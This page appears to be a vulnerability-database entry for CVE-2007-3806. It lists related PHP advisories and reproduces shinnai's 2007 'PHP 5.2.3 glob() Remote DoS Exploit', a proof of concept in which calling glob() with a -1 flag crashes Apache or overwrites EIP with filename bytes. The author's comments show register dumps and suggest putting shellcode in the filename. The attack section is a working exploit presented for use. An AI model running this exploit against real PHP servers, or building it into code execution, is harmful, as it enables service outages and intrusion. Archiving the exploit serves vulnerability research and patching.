Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
 | PHP 5.x < 5.2.4 Multiple Vulnerabilities | 31 Aug 200700:00 | – | nessus |
| Debian DSA-1572-1 : php5 - several vulnerabilities | 13 May 200800:00 | – | nessus |
| Debian DSA-1578-1 : php4 - several vulnerabilities | 19 May 200800:00 | – | nessus |
| FreeBSD : php -- multiple vulnerabilities (71d903fc-602d-11dc-898c-001921ab2fa4) | 14 Sep 200700:00 | – | nessus |
| GLSA-200710-02 : PHP: Multiple vulnerabilities | 9 Oct 200700:00 | – | nessus |
| PHP < 5.2.4 Multiple Vulnerabilities | 3 Sep 200700:00 | – | nessus |
 | php -- multiple vulnerabilities | 30 Aug 200700:00 | – | freebsd |
 | CVE-2007-3806 | 17 Jul 200700:00 | – | cve |
 | CVE-2007-3806 | 17 Jul 200700:00 | – | cvelist |
 | [SECURITY] [DSA 1572-1] New php5 packages fix several vulnerabilities | 11 May 200815:15 | – | debian |
10
<?php
//PHP 5.2.3 glob() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp sp2, worked both from the cli (EIP overwrite) and on apache (Denial of Service)
//Bug discovered with "Footzo" (thanks to rgod).
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
//as you know, glob function expects an integer value passed to "[int $flags] " parameter
//so when you give it something not integer (like -1) a funny thing happens:
//I never seen something like that, EIP is overwrite with 4 bytes of filename :D
//if you save aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb.php under C:\ and launch it
//registers content will appear as follow:
//EAX 00C0F8EC
//ECX 00C0E9FC ASCII "C:\\aaaa"
//EDX 00C0EC1C
//EBX 00C0EC64 UNICODE "C:\\aaaa"
//ESP 00C0E9F0
//EBP 00000000
//ESI 00C0F8EC
//EDI 00C0EC74
//EIP 62626262
//any idea? put shellcode in filename :D
glob("a",-1);
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Sep 2007 00:00Current
EPSS0.05208